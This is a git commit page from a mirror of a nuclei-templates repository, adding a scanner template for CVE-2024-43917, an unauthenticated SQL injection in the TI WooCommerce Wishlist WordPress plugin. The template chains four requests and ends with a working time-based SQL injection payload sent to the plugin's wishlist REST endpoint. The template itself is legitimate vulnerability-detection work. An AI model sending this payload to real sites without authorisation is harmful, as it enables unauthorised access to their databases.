daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Create CVE-2024-43917.yaml

patch-12
Dhiyaneshwaran 2024-10-01 02:37:17 +05:30 committed by GitHub
parent 096f4b31a1
commit 56aa28afa4
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 130 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

130
http/cves/2024/CVE-2024-43917.yaml Normal file
View File

@ -0,0 +1,130 @@
id: CVE-2024-43917
info:
name: WordPress TI WooCommerce Wishlist Plugin <= 2.8.2 - SQL Injection
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
In the latest version (2.8.2 as of writing the article) and below, the plugin is vulnerable to a SQL injection vulnerability that allows any users to execute arbitrary SQL queries in the database of the WordPress site. No privileges are required to exploit the issue. The vulnerability is unpatched on the latest version and is tracked as the CVE-2024-43917.
reference:
- https://patchstack.com/articles/unpatched-sql-injection-vulnerability-in-ti-woocommerce-wishlist-plugin/
- https://patchstack.com/database/vulnerability/ti-woocommerce-wishlist/wordpress-ti-woocommerce-wishlist-plugin-2-8-2-sql-injection-vulnerability?_s_id=cve
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-43917
cwe-id: CWE-89
epss-score: 0.00091
epss-percentile: 0.39641
cpe: cpe:2.3:a:templateinvaders:ti_woocommerce_wishlist:*:*:*:*:free:wordpress:*:*
metadata:
verified: true
max-request: 4
vendor: templateinvaders
product: ti_woocommerce_wishlist
framework: wordpress
fofa-query: body="/wp-content/plugins/ti-woocommerce-wishlist/"
publicwww-query: "/wp-content/plugins/ti-woocommerce-wishlist/"
tags: cve,cve2024,wordpress,ti-woocommerce-wishlist,wp-plugin,sqli,intrusive
flow: http(1) && http(2) && http(3) && http(4)
http:
- raw:
- |
GET /?p=1 HTTP/1.1
Host: {{Hostname}}
redirects: true
extractors:
- type: regex
part: body
internal: true
name: nonce
group: 1
regex:
- '"nonce":"([a-z0-9]+)"'
- raw:
- |
GET /product-category/uncategorized/ HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
part: body
internal: true
name: product_id
group: 1
regex:
- 'data-tinvwl_product_id="([0-9]+)"'
matchers:
- type: word
part: body
words:
- 'data-tinvwl_product_id="'
internal: true
- raw:
- |
POST /product-category/uncategorized/ HTTP/1.1
Host: {{Hostname}}
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryNfcbSwJQX8ALWCMG
------WebKitFormBoundaryNfcbSwJQX8ALWCMG
Content-Disposition: form-data; name="form[tinvwl-hidden-fields]"
[]
------WebKitFormBoundaryNfcbSwJQX8ALWCMG
Content-Disposition: form-data; name="tinv_wishlist_id"
------WebKitFormBoundaryNfcbSwJQX8ALWCMG
Content-Disposition: form-data; name="tinv_wishlist_name"
------WebKitFormBoundaryNfcbSwJQX8ALWCMG
Content-Disposition: form-data; name="product_type"
simple
------WebKitFormBoundaryNfcbSwJQX8ALWCMG
Content-Disposition: form-data; name="product_id"
{{product_id}}
------WebKitFormBoundaryNfcbSwJQX8ALWCMG
Content-Disposition: form-data; name="product_variation"
0
------WebKitFormBoundaryNfcbSwJQX8ALWCMG
Content-Disposition: form-data; name="product_action"
addto
------WebKitFormBoundaryNfcbSwJQX8ALWCMG
Content-Disposition: form-data; name="redirect"
{{RootURL}}/product-category/uncategorized/
------WebKitFormBoundaryNfcbSwJQX8ALWCMG--
extractors:
- type: json
name: share_key
internal: true
json:
- '.wishlist.share_key'
part: body
- raw:
- |
GET /wp-json/wc/v3/wishlist/{{share_key}}/get_products?order=,(select*from(select(sleep(5)))a)--+- HTTP/1.1
Host: {{Hostname}}
X-WP-Nonce: {{nonce}}
matchers-condition: and
matchers:
- type: dsl
dsl:
- "duration>=5"
- "contains(content_type, 'application/json')"
- "contains(body, 'product_id')"
condition: and